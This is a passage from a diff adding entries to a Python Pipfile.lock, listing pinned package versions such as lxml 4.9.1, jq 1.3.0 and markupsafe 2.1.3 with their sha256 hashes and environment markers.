"sha256:c9c59a2120b55788e800d82dfa99b9e156ff8f2227f07c5e3012a45a399620b7", + "sha256:cd021c754b162c0fb55ad5d6b9d960db667faad0fa2ff25bb6e1301b0b6e6a75", + "sha256:d27ec7509b9c18b6d73f2f5ede2622441de812e7b1a80bbd446cb0633bd3d5ae", + "sha256:d5508f0b173e6aa47273bdc0a0b5ba055b59662ba7c7ee5119528f466585526b", + "sha256:d75209eed723105f9596807495d58d10b3470fa6732dd6756595e89925ce2470", + "sha256:db1a39669102a1d8d12b57de2bb7e2ec9066a6f2b3da35ae511ff93b01b5d564", + "sha256:dbfcfc0218093a19c252ca8eb9aee3d29cfdcb586df21049b9d777fd32c14fd9", + "sha256:e0f72c9ddb8cd28532185f54cc1453f2c16fb417a08b53a855c4e6a418edd099", + "sha256:e7c8dc13af7db097bed64a051d2dd49e9f0af495c26995c00a9ee842690d34c0", + "sha256:ea9872c80c132f4663822dd2a08d404073a5a9b5ba6155bea72fb2a79d1093b5", + "sha256:eff4eb9b7eb3e4d0cae3d28c283dc16d9bed6b193c2e1ace3ed86ce48ea8df19", + "sha256:f82d4d717d8ef19188687aa32b8363e96062911e63ba22a0cff7802a8e58e5f1", + "sha256:fc3a569657468b6f3fb60587e48356fe512c1754ca05a564f11366ac9e306526" + ], + "markers": "platform_python_implementation == 'CPython'", + "version": "==2.0.2" + }, + "gunicorn": { + "hashes": [ + "sha256:9dcc4547dbb1cb284accfb15ab5667a0e5d1881cc443e0677b4882a4067a807e", + "sha256:e0a968b5ba15f8a328fdfd7ab1fcb5af4470c28aaf7e55df02a99bc13138e6e8" + ], + "index": "pypi", + "markers": "python_version >= '3.5'", + "version": "==20.1.0" + }, + "humanize": { + "hashes": [ + "sha256:8bc9e2bb9315e61ec06bf690151ae35aeb65651ab091266941edf97c90836404", + "sha256:9783373bf1eec713a770ecaa7c2d7a7902c98398009dfa3d8a2df91eec9311e8" + ], + "markers": "python_version >= '3.8'", + "version": "==4.8.0" + }, + "id-validator": { + "hashes": [ + "sha256:90b73b89f807f8b387beaa7f1f86baa4a64fa5674df5db9ab1a7362433f8e3b8" + ], + "index": "pypi", + "markers": "python_version >= '3'", + "version": "==1.0.20" + }, + "idna": { + "hashes": [ + "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6", + "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" + ], + "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==2.10" + }, + "inflection": { + "hashes": [ + "sha256:1a29730d366e996aaacffb2f1f1cb9593dc38e2ddd30c91250c6dde09ea9b417", + "sha256:f38b2b640938a4f35ade69ac3d053042959b62a0f1076a5bbaa1b9526605a8a2" + ], + "markers": "python_version >= '3.5'", + "version": "==0.5.1" + }, + "jinja2": { + "hashes": [ + "sha256:31351a702a408a9e7595a8fc6150fc3f43bb6bf7e319770cbc0db9df9437e852", + "sha256:6088930bfe239f0e6710546ab9c19c9ef35e29792895fed6e6e31a023a182a61" + ], + "markers": "python_version >= '3.7'", + "version": "==3.1.2" + }, + "jmespath": { + "hashes": [ + "sha256:b85d0567b8666149a93172712e68920734333c0ce7e89b78b3e987f71e5ed4f9", + "sha256:cdf6525904cc597730141d61b36f2e4b8ecc257c420fa2f4549bac2c2d0cb72f" + ], + "markers": "python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==0.10.0" + }, + "jq": { + "hashes": [ + "sha256:0015b80570b38176f5ac22049b957d4f34ee8030f6ee89955f95bce4bfff8451", + "sha256:028604640ba281c2bc5fa1b4284078d4d56d9431c96b6f71715fd801a3d2cdfb", + "sha256:05d44bdf6a97ad4866ad099fed5297214a58e1e3e56657be41495c69ce74aa11", + "sha256:06d02868ec10cf1e744fda3ec1b6928eb2a05fbbb3b52383c85285d52e8e000a", + "sha256:0d8c8a0e7bc6f738e482472b4fbb6be97eab707924661782e90c378327688b29", + "sha256:0dc8ca9e2ea1afc8e856e92eee70f6ab728342d1c071c741b2047d5c08961d8a", + "sha256:118070043a369378feadf22f091e57b4054b3325ccdc248e1f19c8586bfe9e6f", + "sha256:11d6e7c98efcb38b95481687310ed0ec7f230cc8916ac1c054827552f45ece5d", + "sha256:150aeaa02d57fc9c4966c7af8c6c2a9c6736f82a798c7bc72b44dd7970f1f8d8", + "sha256:1569aa11654a686be9323c9c4329d4a961dd96f9f0b9800eb3bdd939b017cb8a", + "sha256:16e28f6964b827a5170a0d7f086367601ef1d420952de81934e79cff638a6bc8", + "sha256:18bb7c70fc01f5e4739b1ac3cbab958eae881b1991615c973b9cdcfcd06ce93f", + "sha256:228c42e825007277fd01ad71f6ea93bda289fe45693b2d3649eeb87b75a6b083", + "sha256:28c6ec10c97e697ca73d1fe188c340d53ad17fc4b42fcca87570c060f9364c55", + "sha256:3c7b8f71778fb4140e923bb716caef0709e6f64d33ea369236f1d43c76d62f7a", + "sha256:4b46fe1f91423699337c5f3b1001943b911bb54a9e045a1b8d6493142f4acc45", + "sha256:4bc0680f7b4cff6a9077a288e6e166a327eb916a50041cf10d9d3df289b1e5d1", + "sha256:4edd3edde1bec54408dc14a4ab4350523e2d69c15cac58033459cff3ff814ca9", + "sha256:52cce695dafc461becee6d14889918db7cccafd6f3c28e9174042caa7e017e96", + "sha256:52ffba73a294949dfddef52a70672e3d5bc694f9e593d3cbcc115449c735e26c", + "sha256:56ea972fd697aea1658c56bd18da9d2ae2494ae9be627858a5152d70cdea75f2", + "sha256:5952b363fd44e4c2e1ceb8a88c0205699ee4eb060c34e1b590f39f3490533549", + "sha256:5ae2b94979bcd6a183aa18056bce975d5081199d83cbf914ff71aecab4e0a2d4", + "sha256:5c4e9d9cdf5e63bddeea01d1150903dcb45c3fbd028ecf4578561b0b6dddb8dc", + "sha256:673ec567be3644166a367627e8393944ce2d21b2e14dc1f4be48b2e3082ccfc2", + "sha256:6b07ad65aa9fca72b7e722585bac5a5e13280257abe9e9d5af845a003e66ff8b", + "sha256:6c427bb8f782eb4ac0326b9f65d5f002bd9a5947d9bc715e662cda659361c48c", + "sha256:71d5725dae1dd2f636fb696865a10f260610a23ea029ca7b78f2b7c033b3b148", + "sha256:75fd74d74e0f78f513fd8517d39fee591b6dc194b422e5b2d88b77899a79a2a9", + "sha256:78d13cbeb6dd512adcf2bbebf393c18e3c0b7e3e366ce7a05b46310ce2924a65", + "sha256:7b1ad8a91623fa3c5cecff9dc398eebf7e5e82ba9982f60e5ef17172d78a4ecc", + "sha256:7c09caae5a24a3216a1bb812489e1ad6bc0e2b7410853c930c272a4ab65c8667", + "sha256:8d263927eb8140c174e715da2ad8c009e65e7d3fa82b8af176744b9367aae860", + "sha256:95160aa31efde7939763c80767e85d9a34544ab87e7ed66ee13f42dbc4595d37", + "sha256:96b66f41a91c9794f8051cc32d8fd3206c6409693f0076b22eacb4faa0bc504f", + "sha256:96da9428a158fa377ec1f432e4790ce3e0640e28004aa1cb6486db374277c6a1", + "sha256:980ac3ad4fa9e61bbec4e17d0d01c7bad11decca49620d9766aff047a4043eb9", + "sha256:b3352b273e17e530de5cfbf55cdba68d6231cdf0ac10ca6baf438e41fd43e881", + "sha256:ba4afcb00c1fc8d1f0d79f0029345f91e207909fd2c125aeedbf7b4cf2c1fc84", + "sha256:bb72811aa78cf0f82d512731c47e69611168909b991b43481d2a6dc0da940835", + "sha256:bbf73f553e23f99c33463041dc04de3b5a5eefdfc35bd9e2e33ba4f7b060249e", + "sha256:d49afd3743d9703d31ed2148d9c5d8edc7bf1c894688f4c72b0d9ef5e0add7b3", + "sha256:dab5daca625ba4c10c3579d55fe057b063ad609f0c0382ae6e28936d7ec8a772", + "sha256:e874298835c55e60bbf27bc21799ec64bc1305a0b1dcc4646f2755210fe43bfa", + "sha256:e97578a5e53b06481dbdf5b88e38e6dd856b53ba7bd68678ceadb50de3799fd1", + "sha256:e97850b803ea8604cd14645a63ad5863d86fdbfaf0bede0da0490c3108956bd0", + "sha256:ead1c073cf33326be15a879475e3dd8b5f5a70ccff95acafbba56ea3d231803d", + "sha256:eb28afd2e43e1ece66618381b646ff1da65fc129f0d9cc600ec224f384add061", + "sha256:ec2255c7fe76070a8ee52cc3d32a7cd7f84fca9a6048873c01b07ca1c70db295", + "sha256:ee0503d45e8b24dd4757460e7664c275aed9a6e5f4986b16a483dc11fb83c19b", + "sha256:f36e1d4837383489b0e0c2c70da06c2cb6332bca4fa864b0c7a1500abfed384a", + "sha256:fa0a8032416746edb57ea570cafc99026c2c240d8a0624c0a43631fc82cc0efa", + "sha256:fa7724caaedf6c48522a6805e4306978defc5f0d6bd6ab0d25eeb7207dae9a90", + "sha256:fd04032736f7b94d1e0720634038cc58980f5eeac7e280bbf5f70e03c7f1afd9", + "sha256:fe9fb7748e39b30b5723a7f6695e2f6c58707563b94f1239766d2c8b9550f147" + ], + "index": "pypi", + "markers": "python_version >= '3.5'", + "version": "==1.3.0" + }, + "jsonlog": { + "hashes": [ + "sha256:d8964ac2f561b821a3ca21cd39849cfbe6da9fd038480e073434f51c65d38971", + "sha256:ee313731f2a8611a13e0c15cfcfbab75c524f27c8bae24eaeb7ee7a061a60c55" + ], + "index": "pypi", + "markers": "python_version >= '3.6' and python_version < '4.0'", + "version": "==4.0.0" + }, + "jsonschema": { + "hashes": [ + "sha256:5bfcf2bca16a087ade17e02b282d34af7ccd749ef76241e7f9bd7c0cb8a9424d", + "sha256:f660066c3966db7d6daeaea8a75e0b68237a48e51cf49882087757bb59916248" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==4.17.0" + }, + "kombu": { + "hashes": [ + "sha256:48ee589e8833126fd01ceaa08f8a2041334e9f5894e5763c8486a550454551e9", + "sha256:fbd7572d92c0bf71c112a6b45163153dea5a7b6a701ec16b568c27d0fd2370f2" + ], + "markers": "python_version >= '3.8'", + "version": "==5.3.1" + }, + "lxml": { + "hashes": [ + "sha256:04da965dfebb5dac2619cb90fcf93efdb35b3c6994fea58a157a834f2f94b318", + "sha256:0538747a9d7827ce3e16a8fdd201a99e661c7dee3c96c885d8ecba3c35d1032c", + "sha256:0645e934e940107e2fdbe7c5b6fb8ec6232444260752598bc4d09511bd056c0b", + "sha256:079b68f197c796e42aa80b1f739f058dcee796dc725cc9a1be0cdb08fc45b000", + "sha256:0f3f0059891d3254c7b5fb935330d6db38d6519ecd238ca4fce93c234b4a0f73", + "sha256:10d2017f9150248563bb579cd0d07c61c58da85c922b780060dcc9a3aa9f432d", + "sha256:1355755b62c28950f9ce123c7a41460ed9743c699905cbe664a5bcc5c9c7c7fb", + "sha256:13c90064b224e10c14dcdf8086688d3f0e612db53766e7478d7754703295c7c8", + "sha256:1423631e3d51008871299525b541413c9b6c6423593e89f9c4cfbe8460afc0a2", + "sha256:1436cf0063bba7888e43f1ba8d58824f085410ea2025befe81150aceb123e345", + "sha256:1a7c59c6ffd6ef5db362b798f350e24ab2cfa5700d53ac6681918f314a4d3b94", + "sha256:1e1cf47774373777936c5aabad489fef7b1c087dcd1f426b621fda9dcc12994e", + "sha256:206a51077773c6c5d2ce1991327cda719063a47adc02bd703c56a662cdb6c58b", + "sha256:21fb3d24ab430fc538a96e9fbb9b150029914805d551deeac7d7822f64631dfc", + "sha256:27e590352c76156f50f538dbcebd1925317a0f70540f7dc8c97d2931c595783a", + "sha256:287605bede6bd36e930577c5925fcea17cb30453d96a7b4c63c14a257118dbb9", + "sha256:2aaf6a0a6465d39b5ca69688fce82d20088c1838534982996ec46633dc7ad6cc", + "sha256:32a73c53783becdb7eaf75a2a1525ea8e49379fb7248c3eeefb9412123536387", + "sha256:41fb58868b816c202e8881fd0f179a4644ce6e7cbbb248ef0283a34b73ec73bb", + "sha256:4780677767dd52b99f0af1f123bc2c22873d30b474aa0e2fc3fe5e02217687c7", + "sha256:4878e667ebabe9b65e785ac8da4d48886fe81193a84bbe49f12acff8f7a383a4", + "sha256:487c8e61d7acc50b8be82bda8c8d21d20e133c3cbf41bd8ad7eb1aaeb3f07c97", + "sha256:4beea0f31491bc086991b97517b9683e5cfb369205dac0148ef685ac12a20a67", + "sha256:4cfbe42c686f33944e12f45a27d25a492cc0e43e1dc1da5d6a87cbcaf2e95627", + "sha256:4d5bae0a37af799207140652a700f21a85946f107a199bcb06720b13a4f1f0b7", + "sha256:4e285b5f2bf321fc0857b491b5028c5f276ec0c873b985d58d7748ece1d770dd", + "sha256:57e4d637258703d14171b54203fd6822fda218c6c2658a7d30816b10995f29f3", + "sha256:5974895115737a74a00b321e339b9c3f45c20275d226398ae79ac008d908bff7", + "sha256:5ef87fca280fb15342726bd5f980f6faf8b84a5287fcc2d4962ea8af88b35130", + "sha256:603a464c2e67d8a546ddaa206d98e3246e5db05594b97db844c2f0a1af37cf5b", + "sha256:6653071f4f9bac46fbc30f3c7838b0e9063ee335908c5d61fb7a4a86c8fd2036", + "sha256:6ca2264f341dd81e41f3fffecec6e446aa2121e0b8d026fb5130e02de1402785", + "sha256:6d279033bf614953c3fc4a0aa9ac33a21e8044ca72d4fa8b9273fe75359d5cca", + "sha256:6d949f53ad4fc7cf02c44d6678e7ff05ec5f5552b235b9e136bd52e9bf730b91", + "sha256:6daa662aba22ef3258934105be2dd9afa5bb45748f4f702a3b39a5bf53a1f4dc", + "sha256:6eafc048ea3f1b3c136c71a86db393be36b5b3d9c87b1c25204e7d397cee9536", + "sha256:830c88747dce8a3e7525defa68afd742b4580df6aa2fdd6f0855481e3994d391", + "sha256:86e92728ef3fc842c50a5cb1d5ba2bc66db7da08a7af53fb3da79e202d1b2cd3", + "sha256:8caf4d16b31961e964c62194ea3e26a0e9561cdf72eecb1781458b67ec83423d", + "sha256:8d1a92d8e90b286d491e5626af53afef2ba04da33e82e30744795c71880eaa21", + "sha256:8f0a4d179c9a941eb80c3a63cdb495e539e064f8054230844dcf2fcb812b71d3", + "sha256:9232b09f5efee6a495a99ae6824881940d6447debe272ea400c02e3b68aad85d", + "sha256:927a9dd016d6033bc12e0bf5dee1dde140235fc8d0d51099353c76081c03dc29", + "sha256:93e414e3206779ef41e5ff2448067213febf260ba747fc65389a3ddaa3fb8715", + "sha256:98cafc618614d72b02185ac583c6f7796202062c41d2eeecdf07820bad3295ed", + "sha256:9c3a88d20e4fe4a2a4a84bf439a5ac9c9aba400b85244c63a1ab7088f85d9d25", + "sha256:9f36de4cd0c262dd9927886cc2305aa3f2210db437aa4fed3fb4940b8bf4592c", + "sha256:a60f90bba4c37962cbf210f0188ecca87daafdf60271f4c6948606e4dabf8785", + "sha256:a614e4afed58c14254e67862456d212c4dcceebab2eaa44d627c2ca04bf86837", + "sha256:ae06c1e4bc60ee076292e582a7512f304abdf6c70db59b56745cca1684f875a4", + "sha256:b122a188cd292c4d2fcd78d04f863b789ef43aa129b233d7c9004de08693728b", + "sha256:b570da8cd0012f4af9fa76a5635cd31f707473e65a5a335b186069d5c7121ff2", + "sha256:bcaa1c495ce623966d9fc8a187da80082334236a2a1c7e141763ffaf7a405067", + "sha256:bd34f6d1810d9354dc7e35158aa6cc33456be7706df4420819af6ed966e85448", + "sha256:be9eb06489bc975c38706902cbc6888f39e946b81383abc2838d186f0e8b6a9d", + "sha256:c4b2e0559b68455c085fb0f6178e9752c4be3bba104d6e881eb5573b399d1eb2", + "sha256:c62e8dd9754b7debda0c5ba59d34509c4688f853588d75b53c3791983faa96fc", + "sha256:c852b1530083a620cb0de5f3cd6826f19862bafeaf77586f1aef326e49d95f0c", + "sha256:d9fc0bf3ff86c17348dfc5d322f627d78273eba545db865c3cd14b3f19e57fa5", + "sha256:dad7b164905d3e534883281c050180afcf1e230c3d4a54e8038aa5cfcf312b84", + "sha256:e5f66bdf0976ec667fc4594d2812a00b07ed14d1b44259d19a41ae3fff99f2b8", + "sha256:e8f0c9d65da595cfe91713bc1222af9ecabd37971762cb830dea2fc3b3bb2acf", + "sha256:edffbe3c510d8f4bf8640e02ca019e48a9b72357318383ca60e3330c23aaffc7", + "sha256:eea5d6443b093e1545ad0210e6cf27f920482bfcf5c77cdc8596aec73523bb7e", + "sha256:ef72013e20dd5ba86a8ae1aed7f56f31d3374189aa8b433e7b12ad182c0d2dfb", + "sha256:f05251bbc2145349b8d0b77c0d4e5f3b228418807b1ee27cefb11f69ed3d233b", + "sha256:f1be258c4d3dc609e654a1dc59d37b17d7fef05df912c01fc2e15eb43a9735f3", + "sha256:f9ced82717c7ec65a67667bb05865ffe38af0e835cdd78728f1209c8fffe0cad", + "sha256:fe17d10b97fdf58155f858606bddb4e037b805a60ae023c009f760d8361a4eb8", + "sha256:fe749b052bb7233fe5d072fcb549221a8cb1a16725c47c37e42b0b9cb3ff2c3f" + ], + "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", + "version": "==4.9.1" + }, + "marisa-trie": { + "hashes": [ + "sha256:00a8f62a6b371ec0a947f49cd960a9dee3ac43eb0c8cce7a4b2736bc20cb6c3d", + "sha256:0ac90d35eec78368f8ec42c45ab9f6ab0ccbd30ddf5e63f801cc62f03839b16b", + "sha256:0e00da36b5297f644e65764252496f3b3aa7f95a7cb53e19ee2354054b759dbb", + "sha256:14536de51294752ef490a470240b83677486a42eb5e3bc97d0bfca4c20b2babb", + "sha256:1a5a51f7d4d8b4e603d5fed992a1e8ab5212291bb20d25d0020b90cb4562da53", + "sha256:1b704487470c9e1f08e31572633e11d25ada0628ec3ebfd28b110aeb62cc2233", + "sha256:2ad8eb6f48167291eb81b95f25f80b9ea02d168951e4df17499fc3c34e9c3f36", + "sha256:31661a8d2094eeb8341cb660b53c33e4828032582dce3895db09567e48de2c52", + "sha256:3421c117b66275b91f6fa07f732a788cce0e2bfa00d312d83516b0155cf72462", + "sha256:346cd9b0bf40385f8aee008d8c4962206962184673aea1631ee51b081c676250", + "sha256:35d0af53db6961c65d655248399cec893071eb5ae2cf06e6571f2fbea038a6d1", + "sha256:3bb9fbf2d10696fc4706984ebbd1bbb09724ab9f16758ec4ce344bbf50326302", + "sha256:3d019d17b0d7f62d6e6d7bd05236d8252624ea1c140beb8bf9c6eeff38b3c707", + "sha256:3fb5fa90aa5fdffa6b9f1ea33d54d683682b53277642cef27bbc2e9ecc9a1c9f", + "sha256:4dfea1c84d8862368b7bda2480b28f0bb465dae7efd9a7ca94b2dfce62648028", + "sha256:571ead866d0b9a70eb016a0b0b5a8c9ec357a92447b63fdd30a497cea4a1945a", + "sha256:5f97883f89e649b47ad22f6ca55a5931986c103a4c52e121101db28cebb9e5f7", + "sha256:615a33ed4f28d6734a71d9fbae836420cfd2e64d5e0d948f00fb7d4c5fe1aed0", + "sha256:68451447d201b8951efa141ca038b5cd2bebd7ad875dba3e5b325ec19f9b04ea", + "sha256:6c13fbd44c9e40eaa380845a9baa64a1fd123bc0de8cbd6e13e8fc11675c3f79", + "sha256:6cf376b51d7a199450d075883d516dc4d134aec6f62ae3afdf224c4c10131464", + "sha256:713644ac3e7ef17adee5eeeb30fcd1bf86de14aa319fe1fe8e7dfad2505dc38a", + "sha256:75889b3dbe544f02d8e55ef4355f39df63643f83fc239ab5651c0356a2b82cc1", + "sha256:77537883f3b73a4d8e3c2d3af04360516af7c4b96271de5d45532eb86fef9356", + "sha256:852d062c863ddc0795196bd30ebb9945b462febc782f12e3316429a58182bfe3", + "sha256:87f2158bd88539a1ce99246aff4a544e0bf244637ff6d5e780befc7fb97c6e29", + "sha256:8e4ef47d20fe2a3b4c36c4ec88334d4661cadef4cda785de2386c4a1a9be9e0d", + "sha256:936878a6c14551c83d17fac6cc7c8fa0a41745f96dd75d3fbc0a90859bbbb2f6", + "sha256:93af5a92405be7f56a226ba6169e32e56c31f6ea58270fa7156ae99adc314ae8", + "sha256:96aef02119b70f37c59a289cb0f7293547780dfe60ba302140f6083518cec9b9", + "sha256:990929e8ba36b650d95d600113896b57525b33000a13dc2be06018abb005b47e", + "sha256:99c2b536641dfb44d790eb4349e08ceb61e8c2876e376bc063013e5ecbb39619", + "sha256:9e80a28bc6de8e6ba3449df55ff3c42ca9fd511ec829dd7774a0f1320f4a888b", + "sha256:9f8d25da9a93ebab0d72eaecf8683fe916e08b8029979d3c3fd9aca60da426a8", + "sha256:9fc453083768b666098f200ad2761d0b17b79c8de2d405748db342cb0529408d", + "sha256:a708cbae3b502fdcb39cc25f2e5079026de1a4814c234c34d13e216967951b28", + "sha256:a74751c141f42b14a430d82f46e1523f73b1b73d7d90de6b0f0a7e22dd75976d", + "sha256:aa63bcf05c3f4dfc0312b3c0c0ea84aed47d59ef4d99b3eeaa718ff938a75cbd", + "sha256:b11adc952efb0ba3d23f3cb98aec58b369f308f48de12f7bb207ca288e304c1d", + "sha256:b804e25a36823a806ae3072214acea389bfa46cd46dc176450fb073f5f2c688b", + "sha256:b9db0b0a659d80b2c2b19601984c093dafa484698311d96a2da34b4cbe887ec1", + "sha256:bb91907fb1c5450819f9e844a1a5f1f81e27fc502e41ba7836842f4b56d04e04", + "sha256:bdcffb4d5707ba02824989de120eac137c49639e67254e5d68d8a874e1153922", + "sha256:cb5efa71bba63edbe5207394eb1652cf5b51018a40fd327614246078f5dec48a", + "sha256:cd14bb68d35c1aeb9923bc38040597883f11e79418a7ddeee6c3a54a53f5476d", + "sha256:d2c20cb7ddf3c145bac0c7bf5c1bcf006054b7604a81487113971b44622cad5c", + "sha256:d305c7ffc912a806fcfcae70afd8dd3c6f915b453a611b70e0e768a8a793d296", + "sha256:d434f4ebd69061f975b7d4f0af9951fccd9c91997bef4e7e9c77720e26f93f56", + "sha256:d4dbb091121e3bd48d8353c8a7885332907a5526286829c7db948da665fafcf9", + "sha256:dc6549c1a7bf743b3da992e2527a71a3251097cf451733c6d3038b03a96f6dcc", + "sha256:dea191db66c122db0660ae127ea6c8f4462886ad9b7525757097a87ee941c4ae", + "sha256:e54ae0a9e7c4623252e3e4bede110a250ad017dc491303e9aa00e10c7a7c14cc", + "sha256:e6486c924a6e2bb58d2b6320932ae7d3b59b54e39b40b16fb41875c20eeb13fe", + "sha256:e6db758035d119172dd9f6315c8038124d2c15e96bd1698b999cd2d5f020b7ce", + "sha256:e7e7ca4338075275a0bd34f99a979dfbdafab4aefe212a9d1e6c3790e56d7c0a", + "sha256:eae0ce778d781c952e6c954b62719fde3251560232151c322d7f06b129d0a7fd", + "sha256:ed65ffd42a28db0f4bae8618e2eac32ccd00068d39abecd7cf4ffc8dc6488295", + "sha256:ef9c087471141a6f10f903355e7b0fa6d98e097c02453241d9949892b47e5cac", + "sha256:f157abd020dfbdd32ab3aa7bda3a6f65b3007f2e3f793313bebd0d6114a39647", + "sha256:f15bde9dc8e1dc7168f696fc49ab3e02c9aa16dde1d9798edf4a942fab1a3009", + "sha256:f25db06c59b66cef1b6d777438096b43acfc463ed9741318f7befd98a22801cd", + "sha256:f80589720dac6a9191a9025c3ecbf271445d0f5c2b78ba881573f0e9ebf48003", + "sha256:fb76cbb76a10231b6e7366a31a7eecfc742d32f8988ded0b5ae8b325c49ef103" + ], + "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==0.8.0" + }, + "markuppy": { + "hashes": [ + "sha256:1adee2c0a542af378fe84548ff6f6b0168f3cb7f426b46961038a2bcfaad0d5f" + ], + "version": "==1.14" + }, + "markupsafe": { + "hashes": [ + "sha256:05fb21170423db021895e1ea1e1f3ab3adb85d1c2333cbc2310f2a26bc77272e", + "sha256:0a4e4a1aff6c7ac4cd55792abf96c915634c2b97e3cc1c7129578aa68ebd754e", + "sha256:10bbfe99883db80bdbaff2dcf681dfc6533a614f700da1287707e8a5d78a8431", + "sha256:134da1eca9ec0ae528110ccc9e48041e0828d79f24121a1a146161103c76e686", + "sha256:1577735524cdad32f9f694208aa75e422adba74f1baee7551620e43a3141f559", + "sha256:1b40069d487e7edb2676d3fbdb2b0829ffa2cd63a2ec26c4938b2d34391b4ecc", + "sha256:282c2cb35b5b673bbcadb33a585408104df04f14b2d9b01d4c345a3b92861c2c", + "sha256:2c1b19b3aaacc6e57b7e25710ff571c24d6c3613a45e905b1fde04d691b98ee0", + "sha256:2ef12179d3a291be237280175b542c07a36e7f60718296278d8593d21ca937d4", + "sha256:338ae27d6b8745585f87218a3f23f1512dbf52c26c28e322dbe54bcede54ccb9", + "sha256:3c0fae6c3be832a0a0473ac912810b2877c8cb9d76ca48de1ed31e1c68386575", + "sha256:3fd4abcb888d15a94f32b75d8fd18ee162ca0c064f35b11134be77050296d6ba", + "sha256:42de32b22b6b804f42c5d98be4f7e5e977ecdd9ee9b660fda1a3edf03b11792d", + "sha256:504b320cd4b7eff6f968eddf81127112db685e81f7e36e75f9f84f0df46041c3", + "sha256:525808b8019e36eb524b8c68acdd63a37e75714eac50e988180b169d64480a00", + "sha256:56d9f2ecac662ca1611d183feb03a3fa4406469dafe241673d521dd5ae92a155", + "sha256:5bbe06f8eeafd38e5d0a4894ffec89378b6c6a625ff57e3028921f8ff59318ac", + "sha256:65c1a9bcdadc6c28eecee2c119465aebff8f7a584dd719facdd9e825ec61ab52", + "sha256:68e78619a61ecf91e76aa3e6e8e33fc4894a2bebe93410754bd28fce0a8a4f9f", + "sha256:69c0f17e9f5a7afdf2cc9fb2d1ce6aabdb3bafb7f38017c0b77862bcec2bbad8", + "sha256:6b2b56950d93e41f33b4223ead100ea0fe11f8e6ee5f641eb753ce4b77a7042b", + "sha256:787003c0ddb00500e49a10f2844fac87aa6ce977b90b0feaaf9de23c22508b24", + "sha256:7ef3cb2ebbf91e330e3bb937efada0edd9003683db6b57bb108c4001f37a02ea", + "sha256:8023faf4e01efadfa183e863fefde0046de576c6f14659e8782065bcece22198", + "sha256:8758846a7e80910096950b67071243da3e5a20ed2546e6392603c096778d48e0", + "sha256:8afafd99945ead6e075b973fefa56379c5b5c53fd8937dad92c662da5d8fd5ee", + "sha256:8c41976a29d078bb235fea9b2ecd3da465df42a562910f9022f1a03107bd02be", + "sha256:8e254ae696c88d98da6555f5ace2279cf7cd5b3f52be2b5cf97feafe883b58d2", + "sha256:9402b03f1a1b4dc4c19845e5c749e3ab82d5078d16a2a4c2cd2df62d57bb0707", + "sha256:962f82a3086483f5e5f64dbad880d31038b698494799b097bc59c2edf392fce6", + "sha256:9dcdfd0eaf283af041973bff14a2e143b8bd64e069f4c383416ecd79a81aab58", + "sha256:aa7bd130efab1c280bed0f45501b7c8795f9fdbeb02e965371bbef3523627779", + "sha256:ab4a0df41e7c16a1392727727e7998a467472d0ad65f3ad5e6e765015df08636", + "sha256:ad9e82fb8f09ade1c3e1b996a6337afac2b8b9e365f926f5a61aacc71adc5b3c", + "sha256:af598ed32d6ae86f1b747b82783958b1a4ab8f617b06fe68795c7f026abbdcad", + "sha256:b076b6226fb84157e3f7c971a47ff3a679d837cf338547532ab866c57930dbee", + "sha256:b7ff0f54cb4ff66dd38bebd335a38e2c22c41a8ee45aa608efc890ac3e3931bc", + "sha256:bfce63a9e7834b12b87c64d6b155fdd9b3b96191b6bd334bf37db7ff1fe457f2", + "sha256:c011a4149cfbcf9f03994ec2edffcb8b1dc2d2aede7ca243746df97a5d41ce48", + "sha256:c9c804664ebe8f83a211cace637506669e7890fec1b4195b505c214e50dd4eb7", + "sha256:ca379055a47383d02a5400cb0d110cef0a776fc644cda797db0c5696cfd7e18e", + "sha256:cb0932dc158471523c9637e807d9bfb93e06a95cbf010f1a38b98623b929ef2b", + "sha256:cd0f502fe016460680cd20aaa5a76d241d6f35a1c3350c474bac1273803893fa", + "sha256:ceb01949af7121f9fc39f7d27f91be8546f3fb112c608bc4029aef0bab86a2a5", + "sha256:d080e0a5eb2529460b30190fcfcc4199bd7f827663f858a226a81bc27beaa97e", + "sha256:dd15ff04ffd7e05ffcb7fe79f1b98041b8ea30ae9234aed2a9168b5797c3effb", + "sha256:df0be2b576a7abbf737b1575f048c23fb1d769f267ec4358296f31c2479db8f9", + "sha256:e09031c87a1e51556fdcb46e5bd4f59dfb743061cf93c4d6831bf894f125eb57", + "sha256:e4dd52d80b8c83fdce44e12478ad2e85c64ea965e75d66dbeafb0a3e77308fcc", + "sha256:fec21693218efe39aa7f8599346e90c705afa52c5b31ae019b2e57e8f6542bb2" + ], + "markers": "python_version >= '3.7'", + "version": "==2.1.3" + }, + "marshmallow": { + "hashes": [ + "sha256:5d2371bbe42000f2b3fb5eaa065224df7d8f8597bc19a1bbfa5bfe7fba8da889", + "sha256:684939db93e80ad3561392f47be0230743131560a41c5110684c16e21ade0a5c" + ], + "markers": "python_version >= '3.8'", + "version": "==3.20.1" + }, + "mock": { + "hashes": [ + "sha256:18c694e5ae8a208cdb3d2c20a993ca1a7b0efa258c247a1e565150f477f83744", + "sha256:5e96aad5ccda4718e0a229ed94b2024df75cc2d55575ba5762d31f5767b8767d" + ], + "markers": "python_version >= '3.6'", + "version": "==5.1.0" + }, + "model-bakery": { + "hashes": [ + "sha256:16178e608e2f414814e3383a9855e39c08810c9dee7b1d8e1354f1fdb7c013bc", + "sha256:c76813d8836ce339df4abd8648d6ed195fd0363f395dd1cb11b8a1898224e4e7" + ], + "markers": "python_version >= '3'", + "version": "==1.15.0" + }, + "mypy": { + "hashes": [ + "sha256:0af4f0e20706aadf4e6f8f8dc5ab739089146b83fd53cb4a7e0e850ef3de0bb6", + "sha256:15b5a824b58c7c822c51bc66308e759243c32631896743f030daf449fe3677f3", + "sha256:17455cda53eeee0a4adb6371a21dd3dbf465897de82843751cf822605d152c8c", + "sha256:2013226d17f20468f34feddd6aae4635a55f79626549099354ce641bc7d40262", + "sha256:24189f23dc66f83b839bd1cce2dfc356020dfc9a8bae03978477b15be61b062e", + 